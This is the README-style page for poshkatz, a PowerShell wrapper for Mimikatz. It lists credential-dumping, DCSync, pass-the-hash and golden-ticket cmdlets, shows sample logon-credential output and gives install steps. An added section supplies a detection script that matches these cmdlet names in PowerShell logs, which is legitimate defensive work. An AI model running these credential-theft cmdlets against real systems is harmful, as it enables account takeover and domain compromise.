poshkatz: PowerShell module for Mimikatz

poshkatz

poshkatz is a PowerShell module for Mimikatz that has a number of cool features!

Features

Mimikatz tab expansion “autocomplete”

Autocompletes mimikatz commands, parameters and parameter values.

Cmdlet wrappers for Mimikatz features

  • Export-MKKerberosTicket
  • Get-MKCredentialVault
  • Get-MKCredentialVaultCredential
  • Get-MKKerberosTicket
  • Get-MKLogonPassword
  • Get-MKLsaCache
  • Get-MKLsaSam
  • Get-MKLsaSecret
  • Get-MKTicket
  • Grant-MKKerberosGoldenTicket
  • Invoke-MKDcSync
  • Invoke-MKPassTheHash

Convert Mimikatz output into PowerShell Objects

PS C:\> mimikatz sekurlsa::logonpassword exit | ConvertFrom-Mimikatz -OutputType LogonPasswords


Domain           : Window Manager
NTLMHash         :
UserName         : DWM-1
SID              : S-1-5-90-1
Password         : (null)
LogonTime        : 10/16/2018 11:27:50 AM
SHA1Hash         :
LogonServer      : (null)
AuthenticationId : 0 ; 48064 (00000000:0000bbc0)
Session          : Interactive from 1

Domain           : IRONMAN
NTLMHash         :
UserName         : IRONMANDC1$
SID              : S-1-5-20
Password         : (null)
LogonTime        : 10/16/2018 11:27:50 AM
SHA1Hash         :
LogonServer      : (null)
AuthenticationId : 0 ; 996 (00000000:000003e4)
Session          : Service from 0

 

Use

  1. Install git
  2. Install posh-git

    install-module posh-git

  3. Build or download a fresh copy of mimikatz
  4. Import the poshkatz module

    git clone https://github.com/STEALTHbits/poshkatz.git
    Import-Module poshkatz.psd1

  5. Ensure mimikatz.exe is in your path
  6. Have some fun

    Get-MKLogonPassword
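
The cmdlet and file names listed on this page are fixed strings, so unmodified use of the module is visible in PowerShell Script Block Logging (event ID 4104). The following is an added example, not code from poshkatz or its author; the function name Find-PoshkatzUse and the sample strings are constructed for illustration.

```powershell
# Added example (not poshkatz code): flag poshkatz names in PowerShell script block text.
function Find-PoshkatzUse {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)]
        [AllowEmptyString()]
        [string]$ScriptBlockText
    )
    begin {
        # Names taken from this page: the cmdlet wrappers and ConvertFrom-Mimikatz.
        $cmdlets = @(
            'Export-MKKerberosTicket', 'Get-MKCredentialVault', 'Get-MKCredentialVaultCredential',
            'Get-MKKerberosTicket', 'Get-MKLogonPassword', 'Get-MKLsaCache', 'Get-MKLsaSam',
            'Get-MKLsaSecret', 'Get-MKTicket', 'Grant-MKKerberosGoldenTicket',
            'Invoke-MKDcSync', 'Invoke-MKPassTheHash', 'ConvertFrom-Mimikatz'
        )
        $alternation = ($cmdlets | ForEach-Object { [regex]::Escape($_) }) -join '|'
        # The lookarounds stop matches inside longer identifiers; the manifest
        # file name from the import step is matched as a second indicator.
        $expr = '(?<![\w-])(' + $alternation + ')(?![\w-])|poshkatz\.psd1'
        $pattern = [regex]::new($expr, 'IgnoreCase')
    }
    process {
        $hits = $pattern.Matches($ScriptBlockText) |
            ForEach-Object { $_.Value } | Sort-Object -Unique
        if ($hits) {
            [pscustomobject]@{
                Indicators      = $hits -join ', '
                ScriptBlockText = $ScriptBlockText
            }
        }
    }
}

# Constructed sample script block texts (not real telemetry).
$samples = @(
    'Import-Module poshkatz.psd1',
    'get-mklogonpassword',
    'Get-ChildItem C:\Windows | Measure-Object',
    'mimikatz sekurlsa::logonpassword exit | ConvertFrom-Mimikatz -OutputType LogonPasswords'
)
$samples | Find-PoshkatzUse | Format-List

# Live use (requires Script Block Logging to be enabled):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { $_.Properties[2].Value } | Find-PoshkatzUse
```

Name matching only catches unmodified copies of the module, so treat a hit as a lead to triage rather than as complete coverage.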

Copyright (c) 2018 Adam Driscoll
Source: https://github.com/STEALTHbits/
